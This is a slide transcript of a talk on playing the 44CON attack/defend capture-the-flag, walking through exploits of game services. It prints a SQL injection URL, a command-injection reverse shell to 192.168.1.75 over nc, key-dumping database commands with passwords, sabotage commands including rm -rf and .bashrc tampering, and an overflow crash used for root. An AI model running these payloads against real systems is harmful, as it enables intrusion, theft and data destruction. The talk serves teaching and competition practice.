Playing the 44CON CTF for fun and profit

Transcript

1. Playing the 44Con CTF for fun & profit

2. Me "Three Headed Monkeys" [email protected] @impdefined

3. Me Software developer Trying not to make things worse Know

   a lot about bugs CTF team 0xbadf00d Contributor to io.smashthestack.org

4. CTF "It's kind of like a Computer Science exam on

   acid"* * CSAW CTF "About"page Solving technical security challenges to get points.

5. CTF Types Challenge-based DEF CON quals Ghost In The Shellcode

   CSAW CTF Attack/defend DEF CON finals 44Con CTF (this year)

6. 44CON CTF

7. 44CON CTF - What we got Virtual Machine image IP

   Address Scope of "attackable" machines

8. Attack & Defend Kind of like a pentest (maybe, I've

   never done a pentest) I have a plan: Recon Harden Write exploits Run riot Get the girl Save the world

9. Step 1 - Recon I'd rather be offline than owned

   Self-recon Capture traffic Quick nmap of non-player servers

10. Recon - Services

11. Recon - Services

12. Recon - Scoring Regular "scoring rounds" Score server stores new

    keys in services Score server checks for previous keys? Every 30 minutes Not great if you're trying to see talks!

13. pastie

14. Pastie

15. Pastie

16. Pastie Written in PHP Pastes stored in a MySQL database

    Recon shows keys are stored as pastes PHP+MySQL - Can you tell what the vuln is yet?

17. Pastie vuln

18. Pastie vuln C Classic SQL injection

19. Pastie fix It's not all pwnpwnpwn Not very sexy Updated

    to use prepared statements

20. Pastie exploit I want keys! Had a look at my

    own DB to figure out the query

21. Pastie exploit https://ip/view/%'+and+lang+=+'text'+order +by+date+desc+--+

22. Pastie exploit

23. Pastie exploit - scripted

24. mailserver

25. Mailserver SMTP and POP3 server Keys are stored in emails

    Written in Ruby I don't know Ruby ~ 500 lines

26. Mailserver - vulnerability

27. Mailserver - vulnerability ??? This just runs whatever Ruby code

    you give it Time to learn Ruby!

28. Mailserver - verification Looking at the logs...

29. Mailserver - exploitation I'm sure Ruby is lovely... ... but

    let's just find some code to copy

30. Mailserver - exploitation

31. Mailserver - exploitation

32. Mailserver - scripted exploitation

33. auth

34. Auth Running on port 23500

35. Auth

36. Auth - vulnerability Source analysis 101

37. Auth - exploitation

38. Auth - exploitation Classic stack buffer overflow Overwrite return address

    with value of my choice Remote code execution..... ....right?

39. Auth - exploitation Welcome to CTF rage

40. Auth - exploitation

41. Auth - exploitation Just put a valid writable address in

    the buffer ptr! Easy if this was a 32bit process. Our memory space is annoying.

42. Auth - exploitation gdb$ info proc map Mapped address spaces:

    Start Addr End Addr Size Offset objfile 0x400000 0x403000 0x3000 0x0 /services/auth/auth 0x602000 0x603000 0x1000 0x2000 /services/auth/auth 0x603000 0x604000 0x1000 0x3000 /services/auth/auth 0x604000 0x625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x7ffffffde000 0x7ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall]

43. Auth - exploitation gdb$ info proc map Mapped address spaces:

    Start Addr End Addr Size Offset objfile 0x0000000000400000 0x0000000000403000 0x3000 0x0 /services/auth/auth 0x0000000000602000 0x0000000000603000 0x1000 0x2000 /services/auth/auth 0x0000000000603000 0x0000000000604000 0x1000 0x3000 /services/auth/auth 0x0000000000604000 0x0000000000625000 0x21000 0x0 [heap] ........ ........ ....... ... ...... 0x00007ffffffde000 0x00007ffffffff000 0x21000 0x0 [stack] 0xffffffffff600000 0xffffffffff601000 0x1000 0x0 [vsyscall] (read-only)

44. Auth - exploitation Time's up! No remote code execution :-(

    Very limited DoS Crash process Restarts automatically

45. servicemon

46. Servicemon Web page Looks like it monitors the other services

    Ruby again

47. Servicemon - vulnerability Command execution of "filelist" parameter

48. Servicemon - exploitation Never mind keys, I want a shell

    contestant@ubuntu:~$ nc -l 31337 -e /bin/sh nc: invalid option -- 'e'

49. Servicemon - exploitation rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.75

    31337 >/tmp/f *cracks knuckles* http://ip:3000/hash?filelist=notafile||rm%20% 2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff% 3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh% 20-i%202>%261%7Cnc%20192.168.1.75% 2031337%20>%2Ftmp%2Ff

50. Servicemon - exploitation contestant@ubuntu:~$ nc -lv 31337 Connection from 192.168.1.72

    port 31337 [tcp/*] accepted $ whoami contestant $ pwd /services/servicemon Now we can have some fun!

51. rampage

52. Steal all the keys mysql --user=sinatra --password=44ConCTF servicemon -e "select

    status from statuses order by created_at desc limit 1;" mysql --user=pastie --password=J@cobsClub\$ paste -e "select pastie from pastie order by date desc limit 1;" OUTPUT=redis-cli -r 1 keys \* | tail -n 1 redis-cli -r 1 lrange $OUTPUT 0 1

53. Leave a calling card echo 'Look behind you! A three-headed

    monkey!' > /services/pastie/.win

54. Annoy echo 'export PROMPT_COMMAND="cd"' >> ~/.bashrc echo exit >> ~/.bashrc

    rm -rf /services

55. escalation

56. Escalation Getting keys is fine Getting shells is better Getting

    root is best

57. Escalation - the hard way $ find /etc -writable /etc/init/mail.conf

    /etc/init/auth.conf

58. Escalation - the hard way USER PID TTY STAT COMMAND

    root 8680 ? Ss /services/auth/auth

59. Escalation - the hard way Next time auth respawns we

    will get a root shell Lame DoS to the rescue! perl -e 'print "auth " . "A"x1100 . "\n"' | nc ip 23500 Connection from 192.168.1.73 port 31337 [tcp/*] accepted # whoami root

60. Escalation - the easy way 220 Mail Service ready (33147)

    HELO 250 Requested mail action okay, completed EXPN respond(client, `whoami`) root

61. summary

62. Summary CTFs are fun! http://smashthestack.org - start with io http://overthewire.org

    http://hackthissite.org

63. questions